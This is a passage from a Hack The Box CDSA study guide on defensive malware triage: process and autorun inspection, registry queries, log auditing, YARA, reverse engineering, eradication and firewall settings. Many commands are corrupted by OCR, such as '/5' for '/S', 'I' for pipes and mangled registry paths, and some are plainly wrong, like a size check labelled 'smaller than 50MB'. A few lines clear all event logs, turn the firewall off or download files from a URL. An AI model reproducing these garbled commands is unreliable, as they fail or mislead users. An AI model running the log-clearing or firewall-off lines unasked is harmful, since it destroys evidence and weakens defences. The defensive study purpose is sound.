                            HTB CDSA
Some malware checks for user files or activity, like if
there are any files in the MS Office history or internet
browsing history. If no or little activity is found, the
malware will consider the machine as a sandbox and
quit.
Detecting VMs
Virtual machines leave artifacts that can be identified by
malware. For example, some drivers installed in VMs
being run on VMWare or Virtualbox give away the fact that
the machine is a VM.
Malware Detection and Triage
The below notes are to investigate and detect the
presence of malware on live systems and some of them
can be used on clone of an infected system.
Methodology
Process Analysis
Look at running processes by running Process
Explorer (GUI) and identify potential indicators of
compromise:
• Items with no icon
• Items with no description or company name
• Unsigned Microsoft images (First add Verified
Signer column under View tab->Select Columns,
then go to Options tab and choose Verify Image
Signatures)
• Check all running process hashes in Virus Total
(Go to Options tab and select Check
                             97 / 547
                           HTB CDSA
VirusTota l. com)
• Suspicious files are in Windows directories or
user profile
• Purple items that are packed or compressed
• Items with open TCP/IP endpoints
Signature File Check
Strings Check
• Right click on suspicious process in Process
Explorer and on pop up window choose Strings tab
and review for suspicious URLs. Repeat for Image
and Memory radio buttons.
• Look for strange URLs in strings
DLL View
• Pop open with Ct rl+D
• Look for suspicious DLLs or services
• Look for no description or no company name
• Look at VirusTotal Results column
Stop and Remove Malware
• Right click and select Suspend for any identified
suspicious processes
• Right click and select Terminate Previous
Suspended processes
Clean up where malicious files Auto start on
reboot
• Launch Autoruns
• Under Options, Check the boxes Verify Code
Signatures and Hide Microsoft entries
• Look for suspicious process file from earlier
steps on the everything tab and uncheck. Safer to
uncheck than delete, in case of error.
• Press FS, to refresh Autoruns, and confirm
malicious file has not recreated the malicious
entry into the previous unchecked auto start
                            98 / 547
                             HTB CDSA
location.
Process Monitor
• If malicious activity is still persistent, run
Process Monitor.
• Look for newly started process that start soon
after terminated from previous steps.
Step 8: Repeat as needed to find all malicious files
and process and/or combine with other tools and
suites.
Automated Malware Scanning
Linux
Using privilege escalation checkers
 wget
 https://raw.githubusercontent.com/pentestmonke
 y/unix-privesc-check/l_x/unix-privesc-check
 ./unix-privesc-check > output.txt
chkrootkit
 apt-get install chkrootkit
 chkrootkit
rkhunter
 apt-get install rkhunter
 rkhunter --update
                              99 / 547
                          HTB CDSA
 rkhunter -check
Tiger
 apt-get install tiger
 tiger
 less /var/log/tiger/security.report,*
lynis
 apt-get install lynis
 lynis audit system
 more /var/logs/lynis. log
Run Linux Malware Detect (LMD)
 wget
 http://www.rfxn.com/downloads/maldetectcurrent
 .tar.gz
 tar xfz maldetect-current.tar.gz
 cd maldetect-*
 ./install.sh
Windows
With Anti Viruses
In Windows, you can use any of the available commercial
security solutions such as KasperSky, Avira or Avast.
Windows defender has become pretty much well capable
for detecting modern security threats as well.
                          100 / 547
                          HTB CDSA
Sys Internals Tools
Check for Executables that are unsigned and open virus
total report
 sigcheck -e -u -vr [path]
Check exe's with bad signature and output them into a
CSV file
 C:\> sigcheck -c -h -s -u -nobanner path-to-
 scan > output.csv
List unsigned DLLs
 C:\> listdlls.exe -u
 C:\> listdlls.exe -u <PROCESS NAME OR PID>
Running offline malware scan
The below will run a scan using Windows Defender.
 C:\> MpCmdRun.exe -SignatureUpdate
 C:\> MpCmdRun.exe -Scan
Checking DLLs of specific process
 C:\Windows\system32>tasklist /m /fi "pid eq
 1304"
Checking Autoruns
                           101 / 547
                           HTB CDSA
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat"
You can also check Autoruns, export them to a CSV file
and scan them with VirusTotal
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
Analyzing startup processes and
autoruns
Windows
Places to look at for investigate startup processes
 Startups
 Run and Runonce in the registry editor
 Task scheduler
With wmic
 C:\> wmic startup list full
 C:\> wmic ntdomain list brief
By viewing the contents startup folder
 C:\> dir
 "%SystemDrive%\ProgramData\Microsoft\Windows\S
 tart Menu\P rog rams\Startup"
                           102 / 547
                     HTB CDSA
C:\> dir "%SystemDrive%\Documents and
Settings\All
Users\Sta rt Menu\Prog rams\Sta rtup"
C:\> dir %userprofile%\Start
Menu\Programs\Startup
C:\> %ProgramFiles%\Startup\
C:\> dir C:\Windows\Start
Menu\Programs\startup
C:\> dir
"C:\Users\%username%\AppData\Roaming\Microsoft
\Windows\Start Menu\Programs\Startup"
C:\> dir
"C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup"
C:\> dir "%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup"
C:\> dir
"%ALLUSERSPROFILE%\Microsoft\Windows\Start
Menu\Programs\Startup"
                     103 / 547
                           HTB CDSA
 C:\> dir "%ALLUSERSPROFILE%\Start
 Menu\Programs\Startup"
Through wininit
 C:\> type C:\Windows\winstart.bat
 C:\> type %windir%\wininit.ini
 C:\> type %windir%\win.ini
With Sysinternal tools
 C:\> autorunsc -accepteula -m
 C:\> type C:\Autoexec.bat"
You can also export the output to a CSV file
 C:\> autorunsc.exe -accepteula -a -c -i -e -f
 -l -m -v
With PowerShell
 Get-ScheduledTask
With Registry
 C:\> reg query HKCR\Comfile\Shell\Open\Command
 C:\> reg query HKCR\Batfile\Shell\Open\Command
 C:\> reg query HKCR\htafile\Shell\Open\Command
                           104 / 547
                     HTB CDSA
C:\> reg query HKCR\Exefile\Shell\Open\Command
C:\> reg query
HKCR\Exefiles\Shell\Open\Command
C:\> reg query HKCR\piffile\shell\open\command
C:\> reg query uHKCU\Control Panel\Desktop"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunOnceEx
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServices
                     105 / 547
                     HTB CDSA
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\RunServicesOnce
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Run
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Load
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Windows\Scripts
C:\> reg query
«HKCU\Software\Microsoft\Windows
NT\CurrentVersion\Windows« /f run
C:\> reg query
«HKCU\Software\Microsoft\Windows
NT\CurrentVersion\Windows« /f load
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
                     106 / 547
                     HTB CDSA
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RecentDocs
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComDlg32\LastVisitedMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComD1g32\0pen5aveMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComDlg32\LastVisitedPidlMRU
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\ComD1g32\0pen5avePidlMRU /s
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Explorer\RunMRU
C:\> reg query
«HKCU\Software\Microsoft\Windows\CurrentVersio
n\Explorer\Shell Folders"
C:\> reg query
                     107 / 547
                     HTB CDSA
uHKCU\Software\Microsoft\Windows\CurrentVersio
n\Explorer\User Shell Folders"
C:\> reg query
HKCU\Software\Microsoft\Windows\CurrentVersion
\Applets\RegEdit /v LastKey
C:\> reg query
"HKCU\Software\Microsoft\InternetExplorer\Type
dURLs"
C:\> reg query
uHKCU\Software\Policies\Microsoft\Windows\Cont
rolPanel \Desktop"
C: \> reg query uHKLM\SOFTWARE\Mic rosoft\Act
iveSetup\Installed Components" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\User Shell Folders"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\explorer\Shell Folders"
C:\> reg query
HKLM\Software\Microsoft\Windows\CurrentVersion
\explorer\ShellExecuteHooks
                     108 / 547
                     HTB CDSA
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Explorer\Browser Helper Objects" /s
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Policies\Explorer\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Run
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Runonce
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunOnceEx
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServices
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\RunServicesOnce
                     109 / 547
                     HTB CDSA
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\Winlogon\Userinit
C:\> reg query
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
\shellServiceObjectDelayLoad
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks" /s
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows"
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows" /f Appinit_DLLs
C:\> reg query
"HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon" /f Shell
C: \> reg query "HKLM\SOFTWARE\Mic
rosoft\WindowsNT\CurrentVersion\Winlogon" /f
Userinit
C:\> reg query
                     110 / 547
                     HTB CDSA
HKLM\SOFTWARE\Policies\Microsoft\Windows\Syste
rn\Scripts
C:\> reg query
HKLM\SOFTWARE\Classes\batfile\shell\open\cornr
nand
C:\> reg query
HKLM\SOFTWARE\Classes\cornfile\shell\open\corn
rnand
C:\> reg query
HKLM\SOFTWARE\Classes\exefile\shell\open\comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\htafile\Shell\Open\Comma
nd
C:\> reg query
HKLM\SOFTWARE\Classes\piffile\shell\open\comma
nd
C:\> reg query
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\C
urrentVersion\Explorer\Browser Helper Objects"
/s
C:\> reg query
                     111 / 547
                           HTB CDSA
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager"
 C:\> reg query
 "HKLM\SYSTEM\CurrentControlSet\Control\Session
 Manager\KnownDLLs"
 C:\> reg query
 "HKLM\SYSTEM\ControlSet001\Control\Session
 Manager\KnownDLLs"
Linux
In Linux, startup and autoruns can be investigated by
viewing the Cron jobs.
List Cron jobs
 crontab -l
List Cron jobs by root and other UID 0 accounts
 crontab -u root -l
Review for unusual Cron jobs
 cat /etc/crontab
 ls /etc/cron,*
Analyzing processes
                           112 / 547
                             HTB CDSA
Windows
Tools to analyze processes
 processhacker
 processmonitor
 processexplorer
Things to pay attention to
 1- Process running with wrong parent process.
 Example would be the authentication manager
 lsass.exe running as a child process of
 explorer.exe
 2- Process executable running from suspicious
 locations such as c:\temp or c:\users\
 3- Misspelled processes.
 4- Process with long command line containing
 weird or encoded characters and URLs.
Linux
View processes
 ps -aux
Get path of suspicious process PID
                             113 / 547
                           HTB CDSA
 ls -al /proc/<PID>/exe
Save file for further malware binary analysis
 cp /proc/<PID>/exe > /malware.elf
View network interfaces
 ifconfig
View network connections
 netstat -antup
 netstat -plantux
View listening ports
 netstat -nap
View network routes
 route
View ARP table
 arp -a
List of processes listening on ports
 lsof -i
                            114 / 547
                            HTB CDSA
Analyzing Logs
Windows
With wevtutil.exe
Auditing Windows Event Logs from command line
Running it from the command line
 wevtutil.exe
requesting the help menu
 wevtutil.exe /?
You can start by copying the event logs into an external
log files so that you can investigate them separately.
 C:\> wevtutil epl Security C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl System C:\<BACK UP
 PATH>\mylogs.evtx
 C:\> wevtutil epl Application C:\<BACK UP
 PATH>\mylogs.evtx
Auditing the application logs and returning 3 results,
descending order and text format
 wevtutil qe Application /c:3 /rd:true /f:text
Clear all logs
                            115 / 547
                           HTB CDSA
 PS C:\> wevtutil el I Foreach-Object {wevtutil
 cl "$_"}
With PowerShell
When analyzing events in Windows, we five special
consideration to the below events:
 Event ID 4624: successful authentication
 Event ID 4648: login attempt using alternate
 credentials (run as, for instance)
 Event ID 4672: super-user account login
We can investigate these event IDs with the below
powershell command
 PS> Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4624,4648,4672}
If we want to extract specific fields such as logged in
username, domain or remote workstation we need to
specify the field numbers in the command.
The below command does this for event ID [4624] and
export it to a [CSV] file
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4624} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[5].value}},
                           116 / 547
                          HTB CDSA
 @{label='domain';expression=
 {$_.properties[6].value}},
 @{label='Source';expression=
 {$_.properties[18].value}} ` | export-csv
 output_events_4624.csv
For every even ID, field numbers differ.
The below command extracts username, domain and
remote workstation for event id [4684]
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4648} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[5].value}},
 @{label='domain';expression=
 {$_.properties[6].value}},
 @{label='Source';expression=
 {$_.properties[12].value}} ` | export-csv
 OUTPUT_events_4648.csv
The last one extracts username and domain fields for
event ID [4672]
 Get-WinEvent -FilterHashtable
 @{path='.\security.evtx';id=4672} ` | Select-
 Object -Property timecreated, id,
 @{label='username';expression=
 {$_.properties[1].value}},
 @{label='domain';expression=
                           117 / 547
                               HTB CDSA
 {$_.properties[2].value}} ` | export-csv
 output_events_4672.csv
Linux
Auditing authentication logs
 # tail /var/log/auth. log
 # grep -i "fail" /var/log/auth. log
Auditing User login logs in Ubuntu
 tail /var/
Auditing samba activity
 grep -i samba /var/log/syslog
Auditing Cron job logs
 grep -i cron /var/log/syslog
Auditing sudo logs
 grep -i sudo /var/log/auth. log
Filtering 404 logs in Apache
 grep 404 apache-logs.log | grep -v -E
 "favicon. ico I robots. txt"
                               118 / 547
                           HTB CDSA
Auditing files requested in Apache
 head access_log | awk '{print $7}'
View root user command history
 # cat /root/.*history
View last logins
 last
Hunting Based on File Search and
Processing
If you have got hints about the malware's file size,
creation and modified date, extension or other attributes
you can then use file search commands to locate Malware
artifacts.
Windows
Based on the extension
[1]
 C:\> dir /A /5 /T:A *.exe *.dll *.bat *·PS1
 *.zip
[2] Below will do the same as above but specifying a date
which will list the files newer than the date used in the
command
                            119 / 547
                              HTB CDSA
 C:\> for %G in (.exe, .dll, .bat, .ps) do
 forfiles -p "C:" -m *%G -s -d +1/1/2023 -c
 "cmd /c echo @fdate @ftime @path"
Based on the name
 C:\> dir /A /5 /T:A bad.exe
Based on date
Below will find   .exe   files after      01/01/2023
 C:\> forfiles /p C:\ /M *.exe /5 /0 +1/1/2023
 /C "cmd /c echo @fdate @ftime @path"
Based on date with Powershell
Below will return files that were modified past 09/21/2023
 Get-Childitem -Path c:\ -Force -Rec~rse -
 Filter '.log -ErrorAction
 Silentl~Con~inue I where {$ .LastWriteTime -gt
 ''2012-09-21''}
Based on the size.
Below will find files smaller than 50MB
 C:\> forfiles /5 /M * /C "cmd /c if @fsize GEO
 5097152 echo @path @fsize"
                              120 / 547
                          HTB CDSA
Based alternate data streams
[1]
 C:\> streams -s <FILE OR DIRECTORY>
Tool link
[2] With PowerShell
We can detect the use of ADS in an entire directory such
as    C:\
 Get-ChildItem -recurse -path C:\ | where {
 Get-Item $_.FullName -stream * } | where
 stream -ne ':$Data'
Common locations to store malware and trojans
 C:\Windows\Temp
 C:\TMP\
 C:\Windows\System32\
Display file content
 [1]
 get-content file
 [2]
 type file
Download a file over HTTP with Powershell
                           121 / 547
                            HTB CDSA
 (new-object sjstem.net.webclient)
 .downloadFile("url","C:\temp")
Linux
List of open files
 lsof
List of open files, using the network
 # lsof -nPi I cut -f 1 -d " "I uniq I tail -n
 +2
List of open files on specific process
 # lsof -c <SERVICE NAME>
Get all open files of a specific process ID
 lsof -p <PID>
List of unlinked processes running
 lsof +Ll
Analyzing WMI Instances
Manually
                            122 / 547
                            HTB CDSA
WMI is [windows management instrumentation] and it
uses event subscriptions and windows query language
[WQL] to perform system actions. It's used by attackers
to create backdoors that perform actions on the system.
WMI Backdoors are created as a persistence mechanism
and it needs administrator privileges on the compromised
host.
When we investigate WMI instances, we look for [event
filters] and [event consumers]. Event filters specify
when the backdoor will run such as [time intervals] and
after [user login]. Event consumers are bindings to event
filters that execute specific action such as running a
process or connect to a C2 server.
Retriving WMI event filters and
consumers
 Get-WMIObject -Namespace root\Subscription -
 Class __EventFilter
This will get you the event filters along with their bindings
of event consumers
Retriving bindings for a specific event
filter
 Get-WMIObject -Namespace root\Subscription -
 Class __FilterToConsumerBinding
[class] and [Namespace] are taken after you running the
first query.
                            123 / 547
                           HTB CDSA
By taking a close look at the filters and the bindings you
can build a perception of whether ther is a malicious WMI
instance.
With Autorun
Using Autorun from [sysinternals] you can go to the
[WMI] tab and it will display all WMI instances along with
the location of any script if any. See below figure
Hunting Malwares with Yara
Yara is a pattern matching tool that can identify malwares
based on patterns such as binary, hexadecimal or textual
strings. Malwares like any other programs stores textual
data which can be inspected with [strings] tool.
Installing Yara
Through package manager
 sudo apt install yara
Manually
 wget
 https://github.com/VirusTotal/yara/archive/v4.
                            124 / 547
                           HTB CDSA
 0.2.tar.gz
 cd yara-4.0.2
 chmod +x configure
 ./configure
 chmod +x bootstrap.sh
 ./bootstrap.sh
 make
 sudo make install
 cd yara-4.0.2
Creating rules
When creating Yara rules, we store them in files called
[Yara rule files]. Every Yara command takes two
arguments; the [yara rule file] and the [name of the file
against which the yara rule file will run].
Yara rule files have the extension of [.yar].
All yara rule files follow the example syntax below.
 rule examplerule {
   condition: true
 }
[examplerule] is the name of the rule and [condition] is
the condition.
Example conditions are below
 Desc : Is used to summarise the objective of
 the yara rule. It doesn't influence the rule
 itself and is considered much like comments in
                           125 / 547
                      HTB CDSA
 coding.
 Meta: Reserved for descriptive information
 about the author of the yara rule
 Strings: Used to check for text or hexadecimal
 strings with files or programs
 Conditions
 Weight
Example Yara Rule
 rule strings-checker {
         meta:
                     author = "motasem"
                     description = "test
 rule"
                     created = "11/10/2021
 00:00"
         strings:
                     $hello-world = "Hello
 World"
                     $ext = ".txt"
         condition:
                     $hello-world and $ext
 }
                      126 / 547
                            HTB CDSA
The above rule looks for the string [Hello World] and the if
the file extension is [txt]. You can try this rule against a
directory
 yara -s strings-checker.yar /home/
Automated yara rules creation
Automated creation of yara rules relies on providing
malicious files and malwares as arguments to the tool so
that the tool will scan the file for malicious strings and
add them to a yara rule
YarGen
YarGen is a yara rule Generator.
 https://github.com/Neo23x0/yarGen
You can generate Yara rules by providing the malicious file
as an argument
 python3 yarGen.py --update
 python3 yarGen.py -m /path-to-malware-file.rar
 --excludegood -o /path-to-output-yara-rule-
 file
Valhalla
 https://www.nextron-systems.com/valhalla/
Yara scanners
                            127 / 547
                           HTB CDSA
Yara scanners are tools that scan for Indicators of
compromise based on ready made yara rules.
LOKI Yara Scanner
 https://github.com/Neo23x0/Loki
This scanner hunts for malwares based on [name], [yara
rule], [hash] and [C2 back connect]
 python loki.py -p [path to be scanned]
Useful modules for malware analysis
The below modules can be used to generate yara rules
that hunt for specific characterstics related to malwares
Python pefile
 pip install pefile
Cuckoo sandbox
 https://cuckoosandbox.org/
Resources for Yara rules
 https://github.com/InQuest/awesome-yara
Reverse Engineering
Definition
                           128 / 547
                              HTB CDSA
Reverse engineering is an advanced method to analyze
binaries including malware samples. It requires knowledge
of the CPU language, that is, Assembly. In reverse
engineering, we reverse the binary back to its cpu
language to reveal all instructions that it sends to the
CPU.
PC Reverse Engineering
Basics
CPUs contain memory pieces we call them registers which
are either 32 bits, or 64 bits (4 bytes or 8 bytes) in
length, respectively. Registers may contain any integer up
to their size (in hex) or a pointer to any piece of data.
Pointers to strings, for example, are null terminated,
hence you’ve seen     \0   in a lot of C, also   \x00 .
Registers
32 bit registers
The general purpose registers include (but are not limited
to) eax, ebx, edx, ecx, ebp,etc.
       ebp: shows the end of the stack. When data is
       added to the stack, esp moves down and up when
       data is removed.
       ebx: general purpose register and usually it is used
       to store return values as an example.
       eax: general purpose register and usually it is used
       to store exit codes ($1) as an example.
       esp: shows the next instruction or item on the
       stack.
       64 bit registers
       same as 32 bit but instead of e we put r and it's
                              129 / 547
                                 HTB CDSA
    proceeded by %
    Instructions
    ATT Instructions
    push(pushl): pushes a variable into the stack. Used
    mostly to push a variable into the stack before using
    it in a function.
    movb and movel: They are used for moving 1 byte of
    data into a register.
    pop: it takes the top variable in the stack and places
    it into a register.
    addl
    addb
    imul
    inc
    dec
    int: This command represents the system interrupt
    which checks the register                %eax   for its content and
    if    %eax   contains   $1    as a value it makes the
    system exit the code.
    ret: Its a call that takes the return address off the
    stack into eip and jumps back to that point in code
    to resume execution. Normally the return address is
    where we called our function. When you call a
    function, the call pushes the return address to the
    stack and jumps to the function start so when you
    use    ret   you technically pop back the return address
    off the stack.
Definitions and Terms
Stack
#Stack is your programs memory that expands backwards.
                                 130 / 547
                           HTB CDSA
It's used for local variables. Newest variables are stored
at the top of the stack and oldest are buried underneath.
Heap
#Heap is used for anything allocated with malloc().
Compiling Assembly Code
Remember when compiling your code to include a header if
you are cross compiling. Example is compiling a 32-bit
assembly code on a 64-bit CPU machine. You may include
the below header in that case
 .section .data
 .section .text
 .globl _start
 _start:
General Remarks
     When the function is called, the function will store
     return address on the stack
     It's always recommended to test your program and
     how it handles input before starting the analysis. To
     get an idea of the system and library calls a binary
     is making use [ltrace] along with providing your
     input.
 ltrace [binary-name] [input]
     Always try to read the source code if available to
     understand the ins and outs of the binary.
                           131 / 547
                            HTB CDSA
       Understanding how the program works is tremendous
       in your analysis.
Reverse Engineering Tools
Radare2
Start the file
 root@kali:r2 -d ./[filename]
Analyze the file
 aa
List the function
 afl
List the main function
 pdf @main
Give visual representation of the code
 vvv
Print out the list of functions
 afl
Hitting a breakpoint at a address
                             132 / 547
                              HTB CDSA
 db [address]
 dc
Printing the value of a parameter
 ds
 px @ [name-variable]
Displaying registers values
 dr
Ghidra
Ghidra is a built-in tool in Kali Linux
Dnspy
PDF analysis & reverse engineering
PDF files are often embedded with malicious code by
attackers. Knowing if a pdf file is malicious or not starts
by analyzing the embedded code.
peepdf
Display embedded code
 root@kali:peepdf demo.pdf
Extracting the embedded code
 root@kali:echo 'extract js > demo2.pdf' >
 extracted_javascript.txt
                              133 / 547
                            HTB CDSA
 root@kali:peepdf -s extracted_javascript.txt
 demo.pdf
 root@kali:cat demo2.pdf
MS Office analysis & reverse engineering
MS files or office files are often embedded with malicious
VBA Macro by attackers. Knowing if a an office file is
malicious or not starts by analyzing the VBA Macro.
Macros are used legitimately to to perform and automate
repetitive tasks as well.
vmonkey
Detecting and displaying macros with vmonkey
 root@kali:vmonkey malicious.doc
olevb.py
Detecting and displaying macros with olevb.py
[1]
 root@kali:olevb.py malicious.doc --reveal --
 decode
[2]
 root@kali:olevba malicious.doc --reveal --
 decode
oledump.py
Oledump allows you to analyze [office files] and [zip
                            134 / 547
                            HTB CDSA
files] and display data streams. Typically vba macros are
found one those streams. A stream with vba macro has
the letter [M] beside it.
Displaying document streams
 oledump.py [office-file.xlsx]
 # example output is below with the file
 streams
 1: 114 '\x01CompObj'
 6: 365 'Macros/PROJECT'
 7: 41 'Macros/PROJECTwm'
 8: M 9852 'Macros/VBA/ThisDocument'
Revealing the content of a data stream
 oledump.py -s 1 [office-file.xlsx]
[1] is the stream number from the previous example
output.
Revealing the content of a data stream containing VBA
Macro
We can use the below command as well. [-d] to dump the
raw content of the VBA Macro
 oledump.py -s 8 -d [office-file.xlsx]
Displaying the source code of the VBA Macro
We will use the option [-v] to decompress the content of
the VBA macro source code
                            135 / 547
                           HTB CDSA
 oledump.py -s 8 -v [office-file.xlsx]
Displaying the strings in the VBA Macro stream
Useful if you want to see raw strings or suspect that
there is an obfuscated or encoded content.
 oledump.py -s 8 -S [office-file.xlsx]
Extracting URLs from malicious VBA Macros
 oledump.py -p plugin_http_heuristics.py
 [office-file.xlsx]
Android Reverse Engineering
Tools
     APKtool
     An effective tool for APK file reverse engineering. It
     can reconstruct application resources after modifying
     the code, decoding them to almost their original
     state.
     Running the below command will unpack the sample
     APK,
 apktool d sample.apk
     JADX
     This program can decompile DEX (Dalvik Executable)
     files and translate them into understandable Java
     source code using both a command-line and graphical
                           136 / 547
                           HTB CDSA
     interface.
     Running the GUI with a sample APK
 jadx-gui sample.apk
     Dex2jar and JD-GUI
     With the aid of the utility dex2jar, DEX files can be
     converted to Java JAR files, which can then be
     viewed using the Java source code viewer JD-GUI.
     Radare2
     Explained above in PC Reverse Engineering
     Strings
     A straightforward tool that takes a binary file and
     extracts and shows readable strings from it. It is a
     useful tool for reverse-engineering Android programs
     and can extract strings from Android APK files.
     Frida
     Dynamic instrumentation toolkit for developers,
     reverse-engineers, and security researchers. Frida
     can do the below:
     Read app memory (Full memory access)
     Call methods/functions
     Hook methods/functions
     You can install Frida on Linux with below commands:
 pip install frida-tool
 pip install frida
Or simply download the latest release according to your OS
from here.
Frida can be invoked with below command:
                            137 / 547
                              HTB CDSA
 frida -U -l injection_script.js <process name
 or PID>
Example of scripts that can be used are found here.
Methodology
APK Structure Breakdown
       AndroidManifest.xml
       META-INF: contains certificate info.
       classes.dex: contains the dalvik bytecode for
       application in the DEX file format. This is the Java
       code that the application will run by default.
       lib/: contains native libraries for the application and
       the CPU-specific directories. Ex: armeabi, mips,
       assets/: other files needed to make the app work.
       For example, in react native apps you may find files
       with extension   .bundle .         This directory may contain
       additional native libraries or DEX files.
Eradication and Malware Removal
Windows
There are many tools and security solutions to remove an
infection. If the infected machine has an Anti-Virus
installed or Windows Defender you can simply perform a
full scan to remove any infection that the Anti-Virus can
recognize.
#Tool-1 gmer.exe
Link
                              138 / 547
                              HTB CDSA
 http://www.gmer.net/?m=0
Running
 C:\> gmer.exe (GUI)
Kill running malicious file
 C:\> gmer.exe -killfile
 C:\WINDOWS\system32\drivers\<MALICIOUS
 FILENAME>.exe
Kill running malicious file in PowerShell
 PS C:\> Stop-Process -Name <PROCESS NAME>
 PS C:\> Stop-Process -ID <PID>
Linux
Stop a malware process
 # kill <MALICIOUS PID>
Change the malware process from execution and move
 chmod -x /usr/sbin/<SUSPICIOUS FILE NAME>
 mkdir /home/quarantine/
                              139 / 547
                             HTB CDSA
 mv /usr/sbin/<SUSPICIOUS FILE NAME>
 /home/quarantine/
Recovery and Remediation
Patching
Windows
Check for and install updates
 C:\> wuauclt.exe /detectnow /updatenow
Linux
        Ubuntu
Fetch list of available updates
 # apt-get update
Strictly upgrade the current packages
 apt-get upgrade
Install updates (new ones)
 apt-get dist-upgrade
        Red Hat Enterprise Linux 2.1,3,4
 # up2date
                             140 / 547
                              HTB CDSA
To update non-interactively
 up2date-nox --update
To install a specific package
 # up2date <PACKAGE NAME>
To update a specific package
 up2date -u <PACKAGE NAME>
       Red Hat Enterprise Linux 5:
 pup
       Red Hat Enterprise Linux 6
 yum update
To list a specific installed package
 yum list installed <PACKAGE NAME>
To install a specific package
 yum install <PACKAGE NAME>
To update a specific package
 yum update <PACKAGE NAME>
                              141 / 547
                            HTB CDSA
Firewall Operations
Windows
Auditing current firewall rules
 C:\> netsh advfirewall firewall show rule
 name=all
Turn off/on the firewall
 C:\> netsh advfirewall set allprofile state on
 C:\> netsh advfirewall set allprof ile state
 off
Enable firewall logging
 C:\> netsh firewall set logging droppedpackets
 connections = enable
Block inbound and allow outbound traffic.
This rule can be used on workstations that don't play the
role of a server
 C:\> netsh advfirewall set currentprofile
 firewallpolicy
 blockinboundalways,allowoutbound
Open port 80 and allow inbound http traffic.
Usually it's applied on machines that play the role of a
webserver
                             142 / 547
                            HTB CDSA
 C:\> netsh advfirewall firewall add rule
 name="Open
 Port 80" dir=in action=allow protocol=TCP
 localport=80
Allow an application to receive inbound traffic.
 C:\> netsh advfirewall firewall add rule
 name="My
 Application" dir=in action=allow
 program="C:\MyApp\MyApp.exe" enable=yes
Allow an application to receive inbound traffic and specify
the profile, remote IP and subnet.
The profile value can be   public , private    or   domain
 netsh advfirewall firewall add rule name="My
 Application" dir=in action=allow
 program="C:\MyApp\MyApp.exe" enable=yes
 remoteip=ip1,172.16.0.0/16,LocalSubnet
 profile=domain
Delete a rule
 C:\> netsh advfirewall firewall delete rule
 name=rule name program="C:\MyApp\MyApp.exe"
Setting up the logging location
                            143 / 547
                            HTB CDSA
 C:\> netsh advfirewall set currentprofile
 logging
 C:\<LOCATION>\<FILE NAME>
Firewall logs location
 C:\>%systemroot%\system32\LogFiles\Firewall\pf
 irewa
 ll. log
You can also disable logging using Powershell
 PS C:\> Get-Content
 $env:systemroot\system32\LogFiles\Firewall\pfi
 rewal.log
AppLocker
AppLocker enables you to control the execution of files
based on the file attributes such as file extension, file
name, publisher name, file path or hash.
You can create AppLocker rules either through group-policy
editor or through powershell
With GPO
Creating an app locker rule to execute only signed exe
files by the publisher
                            144 / 547
                     HTB CDSA
Step 1: Create a new GPO.
Step 2: Right-click on it to edit, and then
navigate
through Computer Configuration, Policies,
Windows
Settings, Security Settings, Application
Control
Policies and Applocker.
Click Configure Rule Enforcement.
Step 3: Under Executable Rules, check the
Configured
box and then make sure Enforce Rules is
selected
from the drop-down box. Click OK.
Step 4: In the left pane, click Executable
Rules.
Step 5: Right-click in the right pane and
select
                     145 / 547
                          HTB CDSA
 Create New Rule.
 Step 6: On the Before You Begin screen, click
 Next.
 Step 7: On the Permissions screen, click Next.
 Step 8: On the Conditions screen, select the
 Publisher condition and click Next.
 Step 9: Click the Browse button and browse to
 any
